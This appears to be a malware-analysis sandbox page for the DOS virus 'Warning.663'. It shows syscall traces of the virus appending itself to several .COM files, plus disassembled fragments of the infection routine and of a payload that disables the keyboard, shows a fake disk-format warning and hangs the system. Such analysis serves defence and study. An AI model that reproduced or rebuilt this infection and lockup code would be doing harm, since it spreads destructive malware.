Sample viewer

vx.netlux.org/Virus.DOS.Warning.663

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:46.702947188Z 26 PC: 12aa2 | Set disk transfer address
2018-12-17T22:50:46.705944717Z 78 PC: 12ab5 | Find first file
2018-12-17T22:50:46.713592137Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:46.7147535Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:46.720997172Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:46.952066973Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:46.960813433Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:46.962970022Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:46.971850543Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:46.973588792Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:46.976543512Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:46.986869101Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:46.988834998Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:46.997593263Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.00060943Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.010480724Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.023902564Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.029731489Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.032299514Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.044314969Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.057523386Z 61 PC: 12c4e | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:47.071725514Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.07360473Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.084949938Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.088209437Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.091341967Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.100664187Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.110982384Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.127485374Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.129651415Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.147064467Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.1586774Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.161866793Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.164410637Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.171392787Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.182789817Z 61 PC: 12c4e | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:47.191931231Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.19445821Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.20252147Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.204625215Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.208914605Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.228422135Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.230478252Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.239276Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.241831771Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.250652508Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.263076209Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.267842173Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.26941995Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.276233174Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.288504092Z 61 PC: 12c4e | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:47.296283181Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.298149478Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.306959627Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.308997514Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.312308178Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.322916234Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.325278134Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.33351889Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.335974141Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.344703556Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.355735591Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.359166756Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.361587533Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.375943114Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.403151025Z 61 PC: 12c4e | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:47.413490447Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.415841983Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.423315238Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.425962273Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.43060213Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.440487433Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.443318484Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.451589456Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.453842738Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.463947501Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.475215615Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.478560125Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.48024722Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.488459465Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.499743505Z 61 PC: 12c4e | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:47.507557634Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.510424466Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.518229708Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.519896612Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.523271618Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.533756446Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.535357976Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.545151716Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.547401995Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.556350622Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.56801037Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.571543866Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.573394536Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.578113691Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.585238874Z 61 PC: 12c4e | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:47.592932764Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.594811711Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.604274942Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:50:47.606595381Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-17T22:50:47.609632529Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-17T22:50:47.621570638Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:50:47.623366164Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:47.630910326Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.633577265Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.642685565Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.654498455Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.658862365Z 47 PC: 12abb | Get disk transfer address
2018-12-17T22:50:47.666071086Z 67 PC: 12c40 | Get or set file attributes
2018-12-17T22:50:47.672423087Z 67 PC: 12c48 | Get or set file attributes
2018-12-17T22:50:47.695070369Z 61 PC: 12c4e | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:47.703852358Z 87 PC: 12c55 | Get or set file date and time
2018-12-17T22:50:47.705902747Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:47.713505096Z 87 PC: 12b5e | Get or set file date and time
2018-12-17T22:50:47.716605534Z 62 PC: 12b64 | Close file
2018-12-17T22:50:47.730231063Z 67 PC: 12b6b | Get or set file attributes
2018-12-17T22:50:47.74107809Z 79 PC: 12ab5 | Find next file
2018-12-17T22:50:47.745543345Z 78 PC: 12c03 | Find first file
2018-12-17T22:50:47.752216631Z 78 PC: 12c03 | Find first file
2018-12-17T22:50:47.760339078Z 78 PC: 12b95 | Find first file
2018-12-17T22:50:47.768080262Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
0x12cc4: je 0x12cc7
0x12cc6: ret
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215
0x12cd4: mov ah, 9
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-17T22:50:47.771353985Z 26 PC: 12ad4 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:44.423739198Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:44.424807429Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:44.431187118Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:44.433122654Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:44.438569491Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:44.45362464Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:44.460501757Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:44.461969103Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:44.468147486Z 66 PC: 12b17 | Move file pointer
2018-12-25T12:27:44.473969234Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:44.484394105Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:44.492971087Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:44.495200085Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:44.501939388Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:44.503285881Z 62 PC: 12b64 | Close file
2018-12-25T12:27:44.511167596Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:44.520786246Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.523268559Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.524444195Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.530410967Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.540167801Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.548774931Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.55027966Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.554293879Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.555254899Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.557479588Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.566302118Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.567523427Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.572448742Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.574282036Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.58226784Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.593956039Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.596026961Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.597103069Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.603535391Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.61377201Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.625236061Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.627539836Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.634525585Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.636178198Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.638990803Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.647468094Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.648718395Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.655342123Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.657122655Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.664629755Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.674152424Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.678289725Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.679404704Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.685209873Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.696545784Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.702919582Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.70416325Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.713877918Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.723097727Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.725424222Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.734022291Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.735405638Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.74169278Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.744199207Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.751917468Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.761608301Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.766047861Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.767568987Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.773445276Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.783339614Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.789753639Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.791065175Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.79794786Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.799194814Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.801399648Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.810117818Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.811636247Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.818082872Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.820959727Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.828509892Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.837227026Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.840769375Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.8420156Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.847325549Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.857802982Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.864901107Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.866696188Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.873917322Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.875758879Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.878466775Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.888369384Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.889753091Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.895976056Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.898149587Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.906067362Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.915811282Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.918531241Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.920145396Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.925526587Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.934905511Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.942521487Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.944156309Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.950637598Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.952951163Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.955640036Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.963966705Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.966255806Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.973024666Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.974783201Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.983297736Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.992942472Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.995768669Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.998474381Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.004172577Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.013714502Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.026382565Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.027708396Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.034188159Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.036538447Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.043702872Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.053208456Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.056736667Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:45.062701806Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:45.068852765Z 78 PC: 12b95 | Find first file
2018-12-25T12:27:45.080494188Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
0x12cc4: je 0x12cc7
0x12cc6: ret
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215
0x12cd4: mov ah, 9
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:45.083322471Z 9 PC: 12cd8 | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:44.806524663Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:44.808429596Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:44.814293395Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:44.815812597Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:44.822651438Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:44.838214001Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:44.844295561Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:44.846282246Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:44.853019492Z 66 PC: 12b17 | Move file pointer
2018-12-25T12:27:44.854874746Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch
0x12a74: call 0x22a4e
0x12a77: pop bx
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]
0x12a7c: mov cx, 0x297
0x12a7f: mov dx, di
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:44.857942108Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:44.867235296Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:44.868567591Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:44.875142267Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:44.877128599Z 62 PC: 12b64 | Close file
2018-12-25T12:27:44.884765842Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:44.894899073Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.902484292Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.903685533Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.907356327Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.914019082Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.922179214Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.923176002Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.931160939Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.932999595Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.936326007Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.945770284Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.947308319Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.953537829Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.955644973Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.963524756Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.973243875Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.977028767Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.97836952Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.984046937Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.994293589Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.00665702Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.008289166Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.015466991Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.017341843Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.020019051Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.028704345Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.03062793Z 64 PC: 12b55 | Write file or device (See above)
